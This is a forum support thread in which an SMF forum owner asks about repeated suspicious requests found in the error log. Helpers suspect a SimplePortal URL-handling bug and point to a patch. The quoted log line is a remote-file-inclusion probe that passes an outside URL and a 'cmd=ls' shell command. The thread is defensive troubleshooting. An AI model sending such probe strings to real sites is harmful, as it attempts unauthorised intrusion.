Question about (attempted?) hack revealed in error log

[busterone]

This error is in my log about 100+ times all from the same IP range of a known spam/hacker bank of dedicated servers.  6 different IPs from the same range has been hammering away with the exact same attempt for about 3 hours straight
No harm done of course, and when I attempt the same string, I receive the "sorry, smf could not connect to the database" page.
I am just curious exactly what they are attempting to do here, possibly a db injection?
(actual path x'd out for this post)

Code Select Expand


http://www.thedemonsden.com/index.php?page[path]=http://www.google.com/humans.txt?&cmd=ls
Undefined offset: 0
File: /homepages/xxxxxxxxxxxxxxx/htdocs/forum/Sources/Subs-Db-mysql.php
Line: 103

[Arantor]

This is a curious one.

What mods do you have installed?

[busterone]

Mod list

Code Select Expand

1. SMF 2.0.8 Update 1.0 [ Uninstall ]
2. SMF 2.0.7 Update 1.0 [ Uninstall ]
3. Add IP2Location to Track IP 1.31 [ Uninstall ]
4. SMF 1.1.19 / 2.0.6 Update 1.0 [ Uninstall ]
5. Treasury 2.12 [ Uninstall ]
6. SMF 2.0.5 Update 1.0 [ Uninstall ]
7. Misc Anti Spam 1.0 [ Uninstall ]
8. Stupid bouncy BBC 1.0 [ Uninstall ]
9. SMF 2.0.4 Update 1.0 [ Uninstall ]
10. SMF 2.0.3 Update 1.0 [ Uninstall ]
11. Annoy User 1.2.2 [ Uninstall ]
12. SimplePortal 2.3.5 [ Uninstall ]
13. SMF 2.0.2 Update 1.0 [ Uninstall ]
14. SMF 2.0.1 Update 1.0 [ Uninstall ]
15. SMF4Mobile Mod 1.0 [ Uninstall ]
16. Sitemap 2.2.0 [ Uninstall ]
17. LMGTFY BBcode v2.2 2.2 [ Uninstall ]
18. Bookmarks 2.3 [ Uninstall ]
19. Spoiler Tag 0.7.2 [ Uninstall ]
20. PM Attachments 1.6 [ Uninstall ]
21. Custom Action Mod 3.2 [ Uninstall ]
22. httpBL 2.5.1 [ Uninstall ]
23. Stop Spammer 2.3.9 [ Uninstall ]
24. SMF Chess 2.1.4 [ Uninstall ]
25. SMF Staff Page 1.7 [ Uninstall ]
26. PM to New Members 1.2 [ Uninstall ]
27. Aeva ~ Auto-Embed Video & Audio 7.0 [ Uninstall ]
28. The Rules 1.2 [ Uninstall ]
29. Add Domaintools to TrackIP 1.1 [ Uninstall ]
30. Arcadeworld Template 2.4 [ Uninstall ]
31. E-Arcade Beta4-SMF2rc2

[Arantor]

Hmmm, I'm wondering if it's possibly a bug in either the arcade or SimplePortal since both do a bunch of handling that isn't just through the normal index.php?action= or ?topic= or ?board= routes. In particular, page is one set up by SimplePortal.

I don't think it's a vulnerability per se but I find it interesting how it produces that exact result since that shouldn't generally be possible in SMF.

[busterone]

Yea, I was curious as well. No harm done, no access, but it did set my alert level on high when the error log was full of them. I deleted the error log and haven't seen one in the last hour, so I presume whatever the bots were attempting, they gave up on. I started to block the entire range in .htaccess, but I think I will wait awhile and see if they return with any new tricks.  The arcade is only accessible to logged in users, so a guest couldn't pull it off on the arcade as far as I know, Simpleportal is a different story though.  I will keep a close watch for a few days to see if they return.  The host is Versaweb, known for spammers.

[Arantor]

It's not about whether it's enabled or not to guests. Fact is, someone's trying to access that URL (which is generally an SP URL, but the arcade has special URL handling) directly and with invalid options.

I would mention it to SP in case it's something they're not aware of (since the behaviour of $_GET in that situation is... unusual)

[busterone]

Alright, I will let them know. Thanks.

[Chen Zhen]

busterone,

  You can patch your issue with what I posted in your thread/report:
http://simpleportal.net/index.php?topic=13587.msg66962#msg66962

Regards.

[busterone]

Thanks. I will get on it tomorrow. tonight it is time to get offline and sleep.